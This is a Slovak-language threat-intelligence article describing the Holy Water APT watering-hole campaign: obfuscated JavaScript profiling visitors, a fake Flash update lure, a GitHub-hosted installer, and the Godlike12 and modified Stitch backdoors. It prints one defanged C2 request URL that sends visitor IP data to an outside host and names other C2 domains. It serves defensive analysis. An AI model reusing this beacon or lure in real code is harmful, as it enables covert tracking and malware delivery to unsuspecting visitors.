Svätá voda APT

Holy Water APT je názov pre skupinu kyberzločincov, ktorí vykonali sériu útokov typu vodná diera proti ázijskej náboženskej a etnickej skupine. TTP (taktiky, techniky a postupy) tohto konkrétneho útoku nemožno pripísať žiadnemu z už známych aktérov ATP (pokročilá perzistentná hrozba), čo viedlo výskumníkov k záveru, že ide o novú skupinu kyberzločincov, ktorá vykazuje znaky malý a flexibilný tím hackerov.

Na vykonanie útoku na vodnú dieru sa zločinci zamerajú na niekoľko webových stránok, ktoré určené ciele často navštevujú. Stránky môžu patriť organizáciám, charitatívnym organizáciám alebo vplyvným jednotlivcom, ktorí patria do cieľovej skupiny. Všetky webové stránky napadnuté Holy Water boli hosťované na rovnakom serveri a okrem iného zahŕňali náboženskú osobnosť, charitu, program dobrovoľníckej služby a organizáciu spravodlivého obchodu.

Útok zahŕňal viacero fáz

Po návšteve napadnutej webovej stránky používateľ vstúpi do prvej fázy útoku, ktorá pozostáva z poškodeného kódu JavaScript s názvom (script|jquery)-css.js a zahmleného čínskou webovou službou Sojson. Úlohou tohto skriptu je určiť, či je používateľ platným cieľom, a na to začne užitočné zaťaženie zoškrabávať údaje o návštevníkovi a odosielať ich na externý server na loginwebmailnic.dynssl[.]com prostredníctvom požiadaviek HTTP GET:

https://loginwebmailnic.dynssl[.]com/all/content.php?jsoncallback=&lanip=&wanip=&urlpath=&_=

Odpoveď zo servera vráti výsledok pravda alebo nepravda, a ak je hodnota pravdivá, spustí sa ďalšia fáza útoku; inak sa nic nedeje.

Počas druhého kroku JavaScript s názvom (script|jquery)-file.js, ktorý je opäť zahmlený rovnakým spôsobom. Tentoraz však hackeri použili Sojson v5 namiesto v4. Na infikovanie používateľa Holy Water APT nevyužíva žiadne softvérové zraniteľnosti alebo slabé stránky. Namiesto toho sa vygeneruje kontextové okno s aktualizáciou prehrávača Flash a potenciálna obeť musí súhlasiť so stiahnutím súboru.

Arsenal malvérových nástrojov Holy Water APT bol hosťovaný na GitHub

Ak používateľ povolí pokračovanie falošnej aktualizácie Flash, pripojí sa k už neaktívnemu úložisku GitHub, ktoré sa nachádza na adrese github.com/AdobeFlash32/FlashUpdate . Na tomto mieste boli uložené štyri rôzne sady nástrojov – inštalačný balík, malvér backdoor pomenovaný výskumníkmi Godlike12 a dve verzie open-source backdoor Python známeho ako Stitch , ktoré hackeri upravili s rozšírenými funkciami. Aktualizačný balík je inštalačný program NSIS, ktorý odstráni legitímny inštalačný program prehrávača Windows Flash Player a nástroj stager, ktorý sa používa na načítanie skutočného obsahu. Backdoor Godlike12 je napísaný v jazyku Go a používa sa na implementáciu kanála Disku Google do serverov Command and Control (C&C, C2). Pokiaľ ide o varianty backdoor Stitch, okrem bežných aktivít typu backdoor, ako je zhromažďovanie informácií a hesiel, zaznamenávanie aktivít, sťahovanie súborov atď., skupina Holy Water pridala možnosť stiahnuť si legitímny inštalačný program Adobe Flash na automatickú aktualizáciu. z ubntrooters.serveuser.com a dosiahnuť vytrvalosť využívaním naplánovaných úloh.